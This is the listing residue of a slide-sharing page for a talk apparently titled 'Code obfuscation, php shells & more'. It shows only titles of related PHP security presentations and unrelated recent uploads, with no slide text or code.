OWASP PHPIDS talk slidesguestd34230
 
Automated code audits
Automated code auditsAutomated code audits
Automated code auditsDamien Seguy
 
Dip Your Toes in the Sea of Security (DPC 2015)
Dip Your Toes in the Sea of Security (DPC 2015)Dip Your Toes in the Sea of Security (DPC 2015)
Dip Your Toes in the Sea of Security (DPC 2015)James Titcumb
 
Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Damien Seguy
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdffortmdu
 
PHP Tips for certification - OdW13
PHP Tips for certification - OdW13PHP Tips for certification - OdW13
PHP Tips for certification - OdW13julien pauli
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?Radek Benkel
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)
Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)
Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)James Titcumb
 
Top 10 php classic traps confoo
Top 10 php classic traps confooTop 10 php classic traps confoo
Top 10 php classic traps confooDamien Seguy
 
Let's write secure Drupal code! - DrupalCamp Oslo, 2018
Let's write secure Drupal code! - DrupalCamp Oslo, 2018Let's write secure Drupal code! - DrupalCamp Oslo, 2018
Let's write secure Drupal code! - DrupalCamp Oslo, 2018Balázs Tatár
 

Similar to Code obfuscation, php shells & more (20)

PHP Static Code Review
PHP Static Code ReviewPHP Static Code Review
PHP Static Code Review
 
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
 
Dip Your Toes in the Sea of Security (PHP UK 2016)
Dip Your Toes in the Sea of Security (PHP UK 2016)Dip Your Toes in the Sea of Security (PHP UK 2016)
Dip Your Toes in the Sea of Security (PHP UK 2016)
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
PHP Basics and Demo HackU
PHP Basics and Demo HackUPHP Basics and Demo HackU
PHP Basics and Demo HackU
 
OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slides
 
Php101
Php101Php101
Php101
 
Automated code audits
Automated code auditsAutomated code audits
Automated code audits
 
Php Security
Php SecurityPhp Security
Php Security
 
Dip Your Toes in the Sea of Security (DPC 2015)
Dip Your Toes in the Sea of Security (DPC 2015)Dip Your Toes in the Sea of Security (DPC 2015)
Dip Your Toes in the Sea of Security (DPC 2015)
 
Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdf
 
PHP Tips for certification - OdW13
PHP Tips for certification - OdW13PHP Tips for certification - OdW13
PHP Tips for certification - OdW13
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)
Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)
Dip Your Toes in the Sea of Security (PHP Berkshire Nov 2015)
 
Top 10 php classic traps confoo
Top 10 php classic traps confooTop 10 php classic traps confoo
Top 10 php classic traps confoo
 
Let's write secure Drupal code! - DrupalCamp Oslo, 2018
Let's write secure Drupal code! - DrupalCamp Oslo, 2018Let's write secure Drupal code! - DrupalCamp Oslo, 2018
Let's write secure Drupal code! - DrupalCamp Oslo, 2018
 

Recently uploaded

From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 

Code obfuscation, php shells & more